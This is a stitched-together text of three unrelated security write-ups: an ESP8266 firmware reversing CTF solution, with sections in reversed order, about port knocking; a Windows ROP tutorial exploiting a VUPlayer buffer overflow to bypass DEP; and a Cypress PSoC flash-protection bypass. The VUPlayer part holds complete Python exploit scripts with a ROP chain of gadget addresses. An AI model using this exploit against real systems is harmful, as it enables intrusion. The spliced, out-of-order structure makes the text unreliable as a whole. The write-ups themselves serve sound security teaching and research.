.code_seg_0:40207411 movi a4, 1337 ; connect to port 1337
.code_seg_0:40207414 mov.n a2, a1
.code_seg_0:40207416 call0 guessed_connect
.code_seg_0:40207419 movi a2, 1000
.code_seg_0:4020741C call0 delay ; wait 1000ms before next connection attempt
.code_seg_0:4020741F l32i.n a3, a12, 0
.code_seg_0:40207421 l32r a4, port_8000
.code_seg_0:40207424 mov.n a2, a1
.code_seg_0:40207426 call0 guessed_connect ; connect to port 8000
.code_seg_0:40207429 movi a2, 1000
.code_seg_0:4020742C call0 delay
.code_seg_0:4020742F l32i.n a3, a12, 0
.code_seg_0:40207431 l32r a4, port_3306
.code_seg_0:40207434 mov.n a2, a1
.code_seg_0:40207436 call0 guessed_connect ; connect to port 3306
.code_seg_0:40207439 movi a2, 1000
.code_seg_0:4020743C call0 delay
.code_seg_0:4020743F l32i.n a3, a12, 0
.code_seg_0:40207441 l32r a4, port_4545
.code_seg_0:40207444 mov.n a2, a1
.code_seg_0:40207446 call0 guessed_connect ; connect to port 4545
.code_seg_0:40207449 movi a2, 1000
.code_seg_0:4020744C call0 delay
.code_seg_0:4020744F l32i.n a3, a12, 0
.code_seg_0:40207451 mov.n a2, a1
.code_seg_0:40207453 movi a4, 445 ; our final port!
.code_seg_0:40207456 call0 guessed_connect
.code_seg_0:40207459 bnez.n a2, loc_40207469
From the above, we’ve determined that:
.code_seg_0:40207400 l32r a12, hostname
Is loading a pointer to the hostname variable into the a12 register. This is followed by loading of what looks like a port number into various other registers, again followed by a call0 instruction. This behaviour led me to guess this is likely our connect() function.
From this analysis, we’ve determined our port knocking sequence to be as follows:
With the application connecting predictably, to services.ioteeth.com on port 445.
With that, we’ve effectively solved the challenge! All that’s left is to get the secrets!
Getting the secrets!
In order to obtain the secrets, we need to knock on the now known ports in the correct order. We can do this in various ways, using nmap or even netcat, but I prefer to use the knock binary, as it’s purpose built (and is part of the knockd package).
Well done! We hope you had fun with this challenge and learned a lot!
In this post, we set out to understand how a particular firmware image communicated with external services to apparently obtain secrets. We knew nothing about the firmware initially and wanted to describe a methodology for analysing unknown formats.
Ultimately we’ve taken the following steps:
Analysed the file using common Linux utilities file, binwalk, strings and hexdump
Made note that our firmware image is based on the ESP8266 and is likely performing a form of port knocking, prior to accessing secrets, based on the strings within.
Performed research, as well as reversed open source tools, to understand the hardware on which the firmware image runs, its processor, boot process and the memory layout, as well the firmware image format itself.
Equipped our tools with the appropriate additions to understand the Xtensa processor.
Written a loader for IDA that’s capable of loading future firmware images of this format.
Came to understand the format of compiled code prior to being exported as a firmware image.
Written and compiled our own code for the ESP8266 to obtain debugging symbols.
Patched and made use of FireEye’s IDB2PAT IDA plugin, to generate FLIRT signatures from our debug build.
Applied our FLIRT signatures across our target firmware image, to recognise library functions.
Observed the use of vtable’s to call library functions and used this to classify other unknown library functions.
Used references to functions of known and likely libraries to locate the firmware image’s main processing loop.
Reverse engineered the main loop function to understand our port knocking sequence.
Made use of the knock client to perform our port knocking and reap all of the secrets!
I’d like to think that this methodology can be applied more generally when analysing unknown binaries or firmware images. In this case, we were fortunate in that most of the internals had been documented already and as documented here, our job was to put the pieces together. I’d encourage the reader to look at other firmware images, such as router firmware for example.
Special thanks to the author’s of the following for their insight:
https://github.com/esp8266/Arduino/blob/master/libraries/ESP8266WiFi/examples/WiFiClient/WiFiClient.ino – ESP8266 Wifi Connect Example
https://richard.burtons.org/2015/05/17/decompiling-the-esp8266-boot-loader-v1-3b3/ – Decompiling the boot loader
A VTABLE in this context is essentially a collection of function pointers per each module of the application’s libraries. We can see that each library’s function pointers are delimited by three nullbytes, represented as the below for example:
Where we can observe two functions of the WiFiClient module, followed by three nullbytes (a delimiter) and finally, followed by the function pointers of the next module, in this case SdFile.
This is an important observation, as it will allow us to recognise if an unknown function belongs to a particular library, based on its presence within the VTABLEs amongst the other libraries. Given the below for example:
We can infer that sub_40207AD0 whilst unnamed and unknown in terms of functionality, does in-fact belong to the WiFiClient library, which hints at its purpose.
Finding the port knock sequence
Armed with all of our obtained knowledge, at this point we’re in a position to find references to the connect() function of the WiFiClient library, or indeed to other functions, including those that are unnamed, in search of our port knocking sequence.
Having searched for references to connect(), I couldn’t find any. I did however, after checking for references to all functions that were part of the WiFiClient library, find a reference to the following unnamed function:
.code_seg_0:4020B214 .int sub_40207A58
The following XREFS were identified:
The function referenced appeared to be quite involved. You can see it below:
As an educated guess, we can assume this is probably the loop function of our image, which is responsible for doing most of the heavy leg work.
Understanding the Xtensa instruction set
In order to understand what the instructions above are doing, we want to have at least a passing familarity with what registers the processor uses and their purpose, as well as what common instructions do and how conditional jumps work.
It turns out someone has documented most of the common instructions of the Xtensa processor.
An excerpt of this guide, which covers loading and storing instructions, as well as register usage, is below:
This is a load/store machine with either 16 or 24 bit instructions. This leads to higher code density than with constand 32 bit encoding. Some instructions have optional “short” 16 bit encodings indicated by appending “.n” to the mnemonic. The Xtensa implements SPARC like register windows on subroutine calls, but I have never seen this feature used in either the bootrom or code generated by gcc, so this can be ignored.
There are 16 tegisters named a0 through a15.
a0 is special – it holds the call return address.
a1 is used by gcc as a stack pointer.
a2 gets used to pass a single argument (and to return a function value).
Understanding the Xtensa calling convention
It would also be helpful to understand the calling convention, which describes how arguments are passed to function calls. I found this document, which describes the calling convention as follows:
Arguments are passed in both registers and memory. The first six incoming arguments are stored in registers a2 through a7, and additional arguments are stored on the stack starting at the current stack pointer a1. […].
Thus we can determine that registers a2 to a7, in most cases will be used to store arguments passed to functions. The register a2 is also used when passing a single argument to a function.
So, why a loader? The main reason was that I wanted something I could re-use when reversing future ESP8266 firmware dumps.
Our loader will be quite simple. IDA loaders typically define the following functions:
defload_file(li, neflags, format):
The first is responsible for identifying an applicable file, based on its signature and is executed when you open a file in IDA for analysis. The second, for interpreting the file, setting entry points, processor, as well as loading and naming segments accordingly. Our loader won’t perform any sanity checking, but should be able to load an image for us.
My loader is derived from the existing loader classes shipped with IDA and of-course, is built to take into account the format we’ve dissected above. It will attempt to identify the firmware image based on signature (image magic), followed by loading each of the segments into memory, whilst trying to guess the names and types of segments based on their loading address.
Below is the Python code for our loader, which lives in IDA’s loader directory:
As you can see, the user segment loading loop, which iterates over each of the segments within ROM 1, attempts to perform some basic classification and naming based on the load address of the given segment, per our rules mentioned earlier.
elif(seg_addr > 0x40100000):
With this loader in use, IDA now recognises our firmware image:
Our segments look a lot tidier:
And we have an entry point! (of the user ROM):
Whilst we’re in a good state to perform cursory analysis, we don’t have any function names to base our analysis on. Ideally, we’d like to identify the routine(s) responsible for connecting to a given port and locate the references to that function, as well as make sense of any other library function calls. This will allow us to discover the ports knocked on, as well as the order of which knocking should take place.
Performing library recognition
There are known and documented methods to identify library functions within a statically linked, stripped image. The most known of which is to use IDA’s Fast Library Acquisition for Identification and Recognition(FLAIR) tools, which in turn creates Fast Library Identification and Recognition Technology (FLIRT) signatures.
The process of creating FLIRT signatures usually requires a number of prerequisite conditions to exist:
A pattern file must be created via either pelf or similar, followed by use of sigmake
A compiled, relocatable library containing the functions and associated names, of which signatures are to be generated against, must exist
The library must be a recognised format and with a supported instruction set
This poses two problems, the first is that we don’t have such a library available to us at present, the second is that Xtensa is not a supported processor type, as shown below.
ELF parser. Copyright (c) 2000-2015 Hex-Rays SA. Version 1.16
Supported processors: MIPS, I960, ARM, IBM PC, M6812, SuperH
Usage: ./pelf [-switch or @file or $env_var] file [pattern-file]
(wildcards are allowed)
The result is that we can’t create pattern files using IDA’s traditional toolset.
The solution to these problems, which we’ll tackle in a moment (not without their own obstacles) are as follows:
We need to install a suitable IDE capable of compiling code for the ESP8266
We need to write code that hopefully, uses the same libraries as our target
We need to compile our code into an ELF file that is statically linked, unstripped and with debug info.
We need to find a way to create signatures from said ELF file
The first step is involved and beyond the scope of this blog post. I’ve opted to use Arduino IDE and configured it to compile for a generic ESP8266 module, with verbose compiler output enabled.
With our environment configured, we can look up example sketches for the ESP8266, we want to find one that performs a similar function to our target. Fortunately, a Github of example code exists, which can help us.
Searching the repository, we see a promising file, WiFiClient.ino, which contains the following code:
This sketch sends data via HTTP GET requests to data.sparkfun.com service.
You need to get streamId and privateKey at data.sparkfun.com and paste them
below. Or just customize this script to talk to other HTTP servers.
constchar* ssid = "your-ssid";
constchar* password = "your-password";
constchar* host = "data.sparkfun.com";
constchar* streamId = "....................";
constchar* privateKey = "....................";
// We start by connecting to a WiFi network
Serial.print("Connecting to ");
/* Explicitly set the ESP8266 to be a WiFi-client, otherwise, it by default,
would try to act as both a client and an access-point and could cause
network-issues with your other WiFi-devices on your WiFi-network. */
This is a good sign, as it’s indicative that at the very least, we’re compiling a Sketch which uses the relevant, identical or similar libraries (there may be version discrepancies) to our target firmware image. This increases the likelihood of successful function identification, based on the signatures we’ll obtain.
Compiling the above sketch, results in the following notable compiler output:
/tmp/arduino_build_867542/sketch_may24a.ino.elf: ELF 32-bit LSB executable, Tensilica Xtensa, version 1 (SYSV), statically linked, with debug_info, not stripped
Loading this ELF file into IDA, we can see we’ve got sensible function names! As depicted below:
So, how can we generate a pattern file from the above ELF to create a FLIRT signature? After much research, I found Fire Eye’s IDB2PAT tool, created by the FLARE the division of Fire Eye.
This tool is described as follows:
This script allows you to easily generate function patterns from an existing IDB database that can then be turned into FLIRT signatures to help identify similar functions in new files. More information is available at: https://www.fireeye.com/blog/threat-research/2015/01/flare_ida_pro_script.html
Having installed this plugin, it initially didn’t work at all for my version of IDA (6.8). This appeared to be the result of IDA using QT5 as opposed to Pyside in later versions (7.x), where the plugin was migrated to support version 7.x of IDA and not version 6.8.
Scrolling through the plugin’s known issues, someone pointed out the above and recommended an earlier version be used, which worked with IDA 6.8. I checked out an earlier commit. No more IDA plugin errors.
Did the plugin work? No. It got stuck in an infinite loop upon being launched. It turned out this issue was related to the version I had containing a bug, where functions less than 32 bytes would cause an infinite loop. To fix this issue, I downloaded the latest version of the individual script file, in which the bug was apparently fixed.
The result, yet another issue:
This was seemingly due to a version discrepancy between the installed and targeted IDA SDK. I fixed the plugin by updating the relevant function call “get_name(…)” to “GetFunctionName(…)”. I also added code to ignore functions that started with the word “sub_”, as these were undefined and not useful to me.
See the documentation to learn how to resolve collisions.
We can see six collisions have occurred. In this context, a collision is generated when sigmake encounters the same signature for more than one function. When this happens, it will generate a .exc file listing the collisions, which we can modify to instruct IDA to use one signature over another, for example.
This is a processor plugin for IDA, to support the Xtensa core found in Espressif ESP8266.
With the above information, we’ve also answered our second question of “What is the processor?“.
Understanding the firmware format
Now that IDA can understand the instruction set of the processor, it’s time to learn how firmware images are comprised in terms of format, data and code. Indeed, what is the format of our firmware image?. To help answer this question, my first point of call was to analyse existing open source tools published by Expressif, in order to work with the ESP8266.
This leads us to ESPTool, an application written in Python capable of displaying some information about binary firmware images, amongst other things.
The manual for this tool also gives away some important information:
The elf2image command converts an ELF file (from compiler/linker output) into the binary executable images which can be flashed and then booted into.
From this, we can determine that compiled images, prior to their transformation into firmware, exist in the ELF-32 Xtensa format. This will be useful later on.
Moving back to the other features of ESPTool, we see it’s indeed able to present information about our firmware image:
Which represented as a structure would look like this:
We can see from the function load_segment() that following our image header are the image segment headers, followed immediately by the segment data itself, for each segment.
The following code parses a segment header:
(offset, size) =struct.unpack('<II', f.read(8))
Which again, represented as a structure would be as follows:
This is helpful, we now know both the format of the firmware image and a number of the tools available to process such images. It’s worth noting that we haven’t considered elements such as checksums, but these aren’t important to us as we don’t intend on patching the firmware image.
Whilst a tangent, it’s worth noting that whilst in this case, our format has been documented and tools exist to parse such formats, often this is not the case. In such cases, I’d advise obtaining as many firmware images as you can from your target devices. At that point, a starting point could be to find commonalities between them, which could indicate what certain bytes mean within the format. Also of use would be to understand how an image is booted into, as the bootloader may act differently depending on certain values at fixed offsets.
Understanding the boot process
So, onto our next question, what is the boot process of the device? Understanding this is important as it will help to clarify our understanding of the image. Richard Aburton has very helpfully reverse engineered the boot loader and described the following key point:
It finds the flash address of the rom to boot. Rom 1 is always at 0×1000 (next sector after boot loader). Rom 2 is half the chip size + 0×1000 (unless the chip is above a 1mb when it’s position it kept down to to 0×81000).
Checking the 0×1000 offset within our firmware image, there is indeed a second image, as denoted by presence of the image magic signature (0xE9):
josh@ioteeth:/tmp/reversing$ hexdump -s 0x1000 -v -C recovered_file | head
00001070 b0 ff ff 3f 24 10 20 40 00 ed fe 3f 80 6e 10 40 |...?$. @...?.n.@|
00001080 04 ed fe 3f 79 6e 10 40 fc ec fe 3f f8 ec fe 3f |...?yn.@...?...?|
00001090 6b 6e 10 40 61 6e 10 40 f6 ec fe 3f 52 6e 10 40 |kn.@an.@...?Rn.@|
This second firmware image sits almost immediately after the padding bytes we observed earlier. Based on the format, we can see from the second byte (0×04) that this ROM has 4 segments and is likely to be user or custom ROM code, with the first ROM image potentially being the bootloader of the device, responsible for bootstrapping.
Whilst there are a lot of nuances to the boot process, the above is all we really need to be aware of at this time.
From the information within, we can conclude the following:
0×40100000 – Instruction RAM. Used by bootloader to load SPI Flash <40000h.
0x3FFE8000 – User data RAM. Available to applications.
0x3FFFFFFF – Anything below this address appears to be data, not code
0×40100000 – Anything above this address appears to be code, not data
Anything that doesn’t match an address exactly, we’ll mark as unknown and classify as either code or data based on the rules above.
It should be noted that simply loading the file as ‘binary’ within IDA, having set the appropriate processor, allows for limited understanding and doesn’t display any xrefs to strings that could guide our efforts:
With this in mind, we can write a simple loader for IDA to identify the firmware image and load the segments accordingly, which should yield better results. We’ll use the memory map above as a guide to name the segments and mark them as code or data accordingly.
As with any unknown binary, our initial analysis will help to uncover any strings that may allude to what we’re looking at, as well as any signatures within the file that could present a point of further analysis. Lastly, we want to look at the hexadecimal representation of the file, in order to identify padding or other blocks of interest.
It would appear our firmware is potentially performing a form of port knocking, before connecting to services.ioteeth.com to retrieve the aforementioned secrets. Port knocking is a means of instructing a firewall to open a predefined TCP/UDP port if the correct sequence of ports are ‘knocked’ on, which is usually performed via sending a TCP SYN packet to the required ports. The firewall would recognise the sequence and permit access to the defined resources.
We can perform a fast port scan to check for any filtered ports across a limited number of popular ports:
Completed Connect Scan at 11:29, 1.20s elapsed (100 total ports)
Nmap scan report for services.ioteeth.com (192.168.1.69)
Host is up (0.00059s latency).
Not shown: 98 closed ports
PORT STATE SERVICE
22/tcp open ssh
445/tcp filtered microsoft-ds
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.23 seconds
We can see that port 445 is filtered, so this could be our target port and equally, this would explain why the service couldn’t be reached by the originator of this challenge. It’s also possible another port is the one being used to obtain/upload secrets and ultimately, we’ll find that port through investigation, we note this however as a passive observation.
Continuing with our analysis, let’s take a look at the hexdump of our firmware image:
josh@ioteeth:/tmp/reversing$ hexdump -v -C recovered_file | head
This padding is potentially useful, as it could be indicative of multiple files or formats being present within our target firmware image.
At this point, we have a number of questions we need to answer before we can continue. We can theorise that our long-term goal, based on the strings observed within the file, is to uncover the port knocking sequence performed by the firmware, which will hopefully allow us to access the external service that’s communicated with. But how do we go about doing that?
It’s worth noting that IDA doesn’t recognise our file, so let’s pause and do some research first.
Questions we need to answer
As with any firmware image, a good starting point prior to reverse engineering is to understand the following:
What is the device in question?
What processor does it operate on?
What is the format of the firmware image in question?
What tools exist to process the type of firmware image we have, if any?
What is the boot process of the device?
What does the physical memory layout look like?
Throughout the course of this section, we’ll work towards learning the answers to the above and understanding how they can help us.
Our penultimate goal will be to load the firmware into IDA for analysis, in a way that allows us to make some sense of what’s happening.
During my time with Cisco Portcullis, I wanted to learn more about reverse engineering embedded device firmware.
This six-part series was written both during my time with Cisco Portcullis, as well in my spare time (if the tagline of this blog didn’t give that away). This series intends to detail my analysis of an embedded device’s firmware, in this case, the ESP8266’s, present a methodology for analysing firmware more generally and of course, solve the challenge presented. It will be one of many series with a focus on firmware reverse engineering and security assessment of ‘smart’ devices.
We will cover the initial analysis, writing an IDA loader and recovering function symbols (names) via IDA’s FLAIR tools. Finally, we’ll reverse engineer the functionality required to solve the challenge, for extra points, without reliance upon string references.
I chose an ESP8266 firmware image supplied by a colleague as a contrived reversing challenge. Mainly because this target made a good starting point due to the simplicity of the firmware format.
The challenge was described as follows:
We managed to obtain the firmware of an unknown device connected to our wireless access point. We’ve been told it’s connecting to a service and retrieving secrets, but we can’t reach the service. Can you?
Update: You can find the a slightly modified version of the supplied binary here (within the zip archive).
This series has been broken down into the following parts:
Hello again! Welcome to another post on Windows exploit development. Today we’re going to be discussing a technique called Return Oriented Programming (ROP) that’s commonly used to get around a type of exploit mitigation called Data Execution Prevention (DEP). This technique is slightly more advanced than previous exploitation methods, but it’s well worth learning because DEP is a protective mechanism that is now employed on a majority of modern operating systems. So without further ado, it’s time to up your exploit development game and learn how to commit a roppery!
Setting up a Windows 7 Development Environment
So far we’ve been doing our exploitation on Windows XP as a way to learn how to create exploits in an OS that has fewer security mechanisms to contend with. It’s important to start simple when you’re learning something new! But, it’s now time to take off the training wheels and move on to a more modern OS with additional exploit mitigations. For this tutorial, we’ll be using a Windows 7 virtual machine environment. Thankfully, Microsoft provides Windows 7 VMs for demoing their Internet Explorer browser. They will work nicely for our purposes here today so go ahead and download the VM from here.
Next, load it into VirtualBox and start it up. Install Immunity Debugger, Python and mona.py again as instructed in the previous blog post here. When that’s ready, you’re all set to start learning ROP with our target software VUPlayer which you can get from the Exploit-DB entry we’re working off here.
Finally, make sure DEP is turned on for your Windows 7 virtual machine by going to Control Panel > System and Security > System then clicking on Advanced system settings, click on Settings… and go to the Data Execution Prevention tab to select ‘Turn on DEP for all programs and services except those I select:’ and restart your VM to ensure DEP is turned on.
With that, you should be good to follow along with the rest of the tutorial.
Data Execution Prevention and You!
Let’s start things off by confirming that a vulnerability exists and write a script to cause a buffer overflow:
buf="A"*3000print"[+] Creating .m3u file of size "+str(len(buf))file=open('vuplayer-dep.m3u','w');file.write(buf);file.close();print"[+] Done creating the file"
Attach Immunity Debugger to VUPlayer and run the script, drag and drop the output file ‘vuplayer-dep.m3u’ into the VUPlayer dialog and you’ll notice that our A character string overflows a buffer to overwrite EIP.
Great! Next, let’s find the offset by writing a script with a pattern buffer string. Generate the buffer with the following mona command:
!mona pc 3000
Then copy paste it into an updated script:
Restart VUPlayer in Immunity and run the script, drag and drop the file then run the following mona command to find the offset:
!mona po 0x68423768
Got it! The offset is at 1012 bytes into our buffer and we can now update our script to add in an address of our choosing. Let’s find a jmp esp instruction we can use with the following mona command:
!mona jmp -r esp
Ah, I see a good candidate at address 0x1010539f in the output files from Mona:
Let’s plug that in and insert a mock shellcode payload of INT instructions:
importstructBUF_SIZE=3000junk="A"*1012eip=struct.pack('<L',0x1010539f)shellcode="\xCC"*200exploit=junk+eip+shellcodefill="\x43"*(BUF_SIZE-len(exploit))buf=exploit+fillprint"[+] Creating .m3u file of size "+str(len(buf))file=open('vuplayer-dep.m3u','w');file.write(buf);file.close();print"[+] Done creating the file"
Time to restart VUPlayer in Immunity again and run the script. Drag and drop the file and…
Nothing happened? Huh? How come our shellcode payload didn’t execute? Well, that’s where Data Execution Prevention is foiling our evil plans! The OS is not allowing us to interpret the “0xCC” INT instructions as planned, instead it’s just failing to execute the data we provided it. This causes the program to simply crash instead of run the shellcode we want. But, there is a glimmer of hope! See, we were able to execute the “JMP ESP” instruction just fine right? So, there is SOME data we can execute, it must be existing data instead of arbitrary data like have used in the past. This is where we get creative and build a program using a chain of assembly instructions just like the “JMP ESP” we were able to run before that exist in code sections that are allowed to be executed. Time to learn about ROP!
Problems, Problems, Problems
Let’s start off by thinking about what the core of our problem here is. DEP is preventing the OS from interpreting our shellcode data “\xCC” as an INT instruction, instead it’s throwing up its hands and saying “I have no idea what in fresh hell this 0xCC stuff is! I’m just going to fail…” whereas without DEP it would say “Ah! Look at this, I interpret 0xCC to be an INT instruction, I’ll just go ahead and execute this instruction for you!”. With DEP enabled, certain sections of memory (like the stack where our INT shellcode resides) are marked as NON-EXECUTABLE (NX), meaning data there cannot be interpreted by the OS as an instruction. But, nothing about DEP says we can’t execute existing program instructions that are marked as executable like for example, the code making up the VUPlayer program! This is demonstrated by the fact that we could execute the JMP ESP code, because that instruction was found in the program itself and was therefore marked as executable so the program can run. However, the 0xCC shellcode we stuffed in is new, we placed it there in a place that was marked as non-executable.
ROP to the Rescue
So, we now arrive at the core of the Return Oriented Programming technique. What if, we could collect a bunch of existing program assembly instructions that aren’t marked as non-executable by DEP and chain them together to tell the OS to make our shellcode area executable? If we did that, then there would be no problem right? DEP would still be enabled but, if the area hosting our shellcode has been given a pass by being marked as executable, then it won’t have a problem interpreting our 0xCC data as INT instructions.
ROP does exactly that, those nuggets of existing assembly instructions are known as “gadgets” and those gadgets typically have the form of a bunch of addresses that point to useful assembly instructions followed by a “return” or “RET” instruction to start executing the next gadget in the chain. That’s why it’s called Return Oriented Programming!
But, what assembly program can we build with our gadgets so we can mark our shellcode area as executable? Well, there’s a variety to choose from on Windows but the one we will be using today is called VirtualProtect(). If you’d like to read about the VirtualProtect() function, I encourage you to check out the Microsoft developer page about it here). But, basically it will mark a memory page of our choosing as executable. Our challenge now, is to build that function in assembly using ROP gadgets found in the VUPlayer program.
Building a ROP Chain
So first, let’s establish what we need to put into what registers to get VirtualProtect() to complete successfully. We need to have:
lpAddress: A pointer to an address that describes the starting page of the region of pages whose access protection attributes are to be changed.
dwSize: The size of the region whose access protection attributes are to be changed, in bytes.
flNewProtect: The memory protection option. This parameter can be one of the memory protection constants.
lpflOldProtect: A pointer to a variable that receives the previous access protection value of the first page in the specified region of pages. If this parameter is NULL or does not point to a valid variable, the function fails.
Okay! Our tasks are laid out before us, time to create a program that will fulfill all these requirements. We will set lpAddress to the address of our shellcode, dwSize to be 0x201 so we have a sizable chunk of memory to play with, flNewProtect to be 0x40 which will mark the new page as executable through a memory protection constant (complete list can be found here), and finally we’ll set lpflOldProtect to be any static writable location. Then, all that is left to do is call the VirtualProtect() function we just set up and watch the magic happen!
First, let’s find ROP gadgets to build up the arguments our VirtualProtect() function needs. This will become our toolbox for building a ROP chain, we can grab gadgets from executable modules belonging to VUPlayer by checking out the list here:
To generate a list of usable gadgets from our chosen modules, you can use the following command in Mona:
!mona rop -m “bass,basswma,bassmidi”
Check out the rop_suggestions.txt file Mona generated and let’s get to building our ROP chain.
First let’s place a value into EBP for a call to PUSHAD at the end:
PUSHAD will place the register values on the stack in the following order: EAX, ECX, EDX, EBX, original ESP, EBP, ESI, and EDI. If you’ll recall, this means that the stack will look something like this with the ROP gadgets we used to setup the appropriate registers:
Now our stack will be setup to correctly call the VirtualProtect() function! The top param hosts our shellcode location which we want to make executable, we are giving it the ESP register value pointing to the stack where our shellcode resides. After that it’s the dwSize of 0x201 bytes. Then, we have the memory protection value of 0x40 for flNewProtect. Then, it’s the valid writable location of 0x101082db for lpflOldProtect. Finally, we have the address for our VirtualProtect() function call at 0x1060e25c.
With the JMP ESP instruction, EIP will point to the VirtualProtect() call and we will have succeeded in making our shellcode payload executable. Then, it will slide down a NOP sled into our shellcode which will now work beautifully!
Updating Exploit Script with ROP Chain
It’s time now to update our Python exploit script with the ROP chain we just discussed, you can see the script here:
importstructBUF_SIZE=3000defcreate_rop_chain():# rop chain generated with mona.py - www.corelan.berop_gadgets=[0x10010157,# POP EBP # RETN [BASS.dll]0x10010157,# skip 4 bytes [BASS.dll]0x10015f77,# POP EAX # RETN [BASS.dll]0xfffffdff,# Value to negate, will become 0x000002010x10014db4,# NEG EAX # RETN [BASS.dll]0x10032f72,# XCHG EAX,EBX # RETN 0x00 [BASS.dll]0x10015f82,# POP EAX # RETN [BASS.dll]0xffffffc0,# Value to negate, will become 0x000000400x10014db4,# NEG EAX # RETN [BASS.dll]0x10038a6d,# XCHG EAX,EDX # RETN [BASS.dll]0x101049ec,# POP ECX # RETN [BASSWMA.dll]0x101082db,# &Writable location [BASSWMA.dll]0x1001621c,# POP EDI # RETN [BASS.dll]0x1001dc05,# RETN (ROP NOP) [BASS.dll]0x10604154,# POP ESI # RETN [BASSMIDI.dll]0x10101c02,# JMP [EAX] [BASSWMA.dll]0x10015fe7,# POP EAX # RETN [BASS.dll]0x1060e25c,# ptr to &VirtualProtect() [IAT BASSMIDI.dll]0x1001d7a5,# PUSHAD # RETN [BASS.dll]0x10022aa7,# ptr to 'jmp esp' [BASS.dll]]return''.join(struct.pack('<I',_)for_inrop_gadgets)junk="A"*1012rop_chain=create_rop_chain()eip=struct.pack('<L',0x10601033)# RETN (BASSMIDI.dll)nops="\x90"*16shellcode="\xCC"*200exploit=junk+eip+rop_chain+nops+shellcodefill="\x43"*(BUF_SIZE-len(exploit))buf=exploit+fillprint"[+] Creating .m3u file of size "+str(len(buf))file=open('vuplayer-dep.m3u','w');file.write(buf);file.close();print"[+] Done creating the file"
We added the ROP chain in a function called create_rop_chain() and we have our mock shellcode to verify if the ROP chain did its job. Go ahead and run the script then restart VUPlayer in Immunity Debug. Drag and drop the file to see a glorious INT3 instruction get executed!
You can also inspect the process memory to see the ROP chain layout:
Now, sub in an actual payload, I’ll be using a vanilla calc.exe payload. You can view the updated script below:
Run the final exploit script to generate the m3u file, restart VUPlayer in Immunity Debug and voila! We have a calc.exe!
Also, if you are lucky then Mona will auto-generate a complete ROP chain for you in the rop_chains.txt file from the !mona rop command (which is what I used). But, it’s important to understand how these chains are built line by line before you go automating everything!
Resources, Final Thoughts and Feedback
Congrats on building your first ROP chain! It’s pretty tricky to get your head around at first, but all it takes is a little time to digest, some solid assembly programming knowledge and a bit of familiarity with the Windows OS. When you get the essentials under your belt, these more advanced exploit techniques become easier to handle. If you found anything to be unclear or you have some recommendations then send me a message on Twitter (@shogun_lab). I also encourage you to take a look at some additional tutorials on ROP and the developer docs for the various Windows OS memory protection functions. See you next time in Part 6!
I dumped a Cypress PSoC 1 (CY8C21434) flash memory, bypassing the protection, by doing a cold-boot stepping attack, after reversing the undocumented details of the in-system serial programming protocol (ISSP).
It allows me to dump the PIN of the hard-drive from part 1 directly:
syncing: KO OK
PIN: 1 2 3 4 5 6 7 8 9
So, as we have seen in part 1, the Cypress PSoC 1 CY8C21434 microcontroller seems like a good target, as it may contain the PIN itself. And anyway, I could not find any public attack code, so I wanted to take a look at it.
Our goal is to read its internal flash memory and so, the steps we have to cover here are to:
manage to “talk” to the microcontroller
find a way to check if it is protected against external reads (most probably)
find a way to bypass the protection
There are 2 places where we can look for the valid PIN:
the internal flash memory
the SRAM, where it may be stored to compare it to the PIN entered by the user
“Talking” to a micro-controller can imply different things from vendor to vendor but most of them implement a way to interact using a serial protocol (ICSP for Microchip’s PIC for example).
Cypress’ own proprietary protocol is called ISSP for “in-system serial programming protocol”, and is (partially) described in its documentation. US Patent US7185162 also gives some information.
There is also an open source implemention called HSSP, which we will use later.
ISSP basically works like this:
reset the µC
output a magic number to the serial data pin of the µC to enter external programming mode
send commands, which are actually long strings of bits called “vectors”
The ISSP documentation only defines a handful of such vectors:
Initialize-3 (3V and 5V variants)
SET-BLOCK-NUM: 10011111010dddddddd111 where dddddddd=block #
READ-BYTE: 10110aaaaaaZDDDDDDDDZ1 where DDDDDDDD = data out, aaaaaa = address (6 bits)
WRITE-BYTE: 10010aaaaaadddddddd111 where dddddddd = data in, aaaaaa = address (6 bits)
READ-CHECKSUM: 10111111001ZDDDDDDDDZ110111111000ZDDDDDDDDZ1 where DDDDDDDDDDDDDDDD = Device Checksum data out
Each vector is 22 bits long and seem to follow some pattern. Thankfully, the HSSP doc gives us a big hint: “ISSP vector is nothing but a sequence of bits representing a set of instructions.”
Demystifying the vectors
Now, of course, we want to understand what’s going on here. At first, I thought the vectors could be raw M8C instructions, but the opcodes did not match.
Then I just googled the first vector and found this research by Ahmed Ismail which, while it does not go into much details, gives a few hints to get started: “Each instruction starts with 3 bits that select 1 out of 4 mnemonics (read RAM location, write RAM location, read register, or write register.) This is followed by the 8-bit address, then the 8-bit data read or written, and finally 3 stop bits.”
Then, reading the Techical reference manual’s section on the Supervisory ROM (SROM) is very useful. The SROM is hardcoded (ROM) in the PSoC and provides functions (like syscalls) for code running in “userland”:
00h : SWBootReset
01h : ReadBlock
02h : WriteBlock
03h : EraseBlock
06h : TableRead
07h : CheckSum
08h : Calibrate0
09h : Calibrate1
By comparing the vector names with the SROM functions, we can match the various operations supported by the protocol with the expected SROM parameters.
This gives us a decoding of the first 3 bits :
100 => “wrmem”
101 => “rdmem”
110 => “wrreg”
111 => “rdreg”
But to fully understand what is going on, it is better to be able to interact with the µC.
Talking to the PSoC
As Dirk Petrautzki already ported Cypress’ HSSP code on Arduino, I used an Arduino Uno to connect to the ISSP header of the keyboard PCB.
Note that over the course of my research, I modified Dirk’s code quite a lot, you can find my fork on GitHub: here, and the corresponding Python script to interact with the Arduino in my cypress_psoc_tools repository.
So, using the Arduino, I first used only the “official” vectors to interact, and in order to try to read the internal ROM using the VERIFY command. Which failed, as expected, most probably because of the flash protection bits.
I then built my own simple vectors to read/write memory/registers.
Note that we can read the whole SRAM, even though the flash is protected !
Identifying internal registers
After looking at the vector’s “disassembly”, I realized that some undocumented registers (0xF8-0xFA) were used to specify M8C opcodes to execute directly !
This allowed me to run various opcodes such as ADD, MOV A,X, PUSH or JMP, which, by looking at the side effects on all the registers, allowed me to identify which undocumented registers actually are the “usual” ones (A, X, SP and PC).
In the end, the vector’s “dissassembly” generated by HSSP_disas.rb looks like this, with comments added for clarity:
At this point, I am able to interact with the PSoC, but I need reliable information about the protection bits of the flash. I was really surprised that Cypress did not give any mean to the users to check the protection’s status. So, I dug a bit more on Google to finally realize that the HSSP code provided by Cypress was updated after Dirk’s fork.
By using this vector (see read_security_data in psoc.py), we get all the protection bits in SRAM at 0x80, with 2 bits per block.
